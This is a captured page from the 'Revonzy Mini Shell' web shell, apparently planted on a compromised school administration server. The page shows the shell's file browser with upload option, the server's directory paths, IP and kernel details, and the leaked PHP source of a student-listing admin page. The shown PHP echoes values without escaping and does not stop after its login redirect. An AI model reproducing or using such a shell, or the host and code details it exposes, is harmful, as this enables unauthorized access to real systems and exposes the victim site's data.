Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/panel.atsevairag.com/atse_admin_panel007/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/panel.atsevairag.com/atse_admin_panel007/view-students.php

<?php

	require_once("../lib/class/functions.php");
	
	$db = new functions();
	
	$current_page = "";
	
	if(!isset($_SESSION['current_admn_email']))
	{	
		header("Location:/atse_admin_panel007/index.php");
	}
 	$center_name	=	"";
	$school_name	=	"";
?>
<html>
<head>
	<meta charset="UTF-8">
	<title>ATSE Vairag</title>
	
	<link rel="stylesheet" type="text/css" href="/css/stylesheet.css" />
	
</head>
<body>

	<?php
		require_once('header.php');
	?>
	<div style="min-height:570px;">
		<div class="admin-mid-section">
		<form action="student-report.php" method="POST">
	<select name="center_name" class="txtflds">
				
				<?php
				
				$centres_list = array();
				$centres_list = $db->get_all_added_centres();
				
				if(!empty($centres_list))
				{
			?>
				<option value="केंद्र निवडा">केंद्र निवडा</option>
			<?php
					$count = 0;
					foreach($centres_list as $centre)
					{
						$id			=	$centres_list[$count][0];
						$c_name=	$centres_list[$count][1];
			?>
					<option value="<?php echo $c_name; ?>" <?php if($center_name==$id){ ?>selected<?php } ?>><?php echo $c_name; ?></option>
			<?php
						$count++;
					}
				}	
				else
				{
			?>
					<option value="कोणत्याही शाळेची नोंद केलेली नाही ">कोणत्याही केंद्राची नोंद केलेली नाही</option>
			<?php
				}
			?>
			</select>
			
			
		  <select name="school_name" class="txtflds">
				
				<?php
				
				$centres_list = array();
				$centres_list = $db->get_all_added_schools();
				
				if(!empty($centres_list))
				{
			?>
				<option value="शाळा निवडा">शाळा निवडा</option>
			<?php
					$count = 0;
					foreach($centres_list as $centre)
					{
						$id			=	$centres_list[$count][0];
						$center_name=	$centres_list[$count][1];
			?>
					<option value="<?php echo $center_name; ?>" <?php if($school_name==$id){ ?>selected<?php } ?>><?php echo $center_name; ?></option>
			<?php
						$count++;
					}
				}	
				else
				{
			?>
					<option value="कोणत्याही शाळेची नोंद केलेली नाही ">कोणत्याही शाळेची नोंद केलेली नाही</option>
			<?php
				}
			?>
			</select>
			<input type="submit" name="search_std_btn" value="विद्यार्थी यादी " id="send_form" class="reg_btn_form" style="width:160px;" />
			</form>
			</div>
			</div>
	<?php
		require_once('footer.php');
	?>

</body>
</html>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4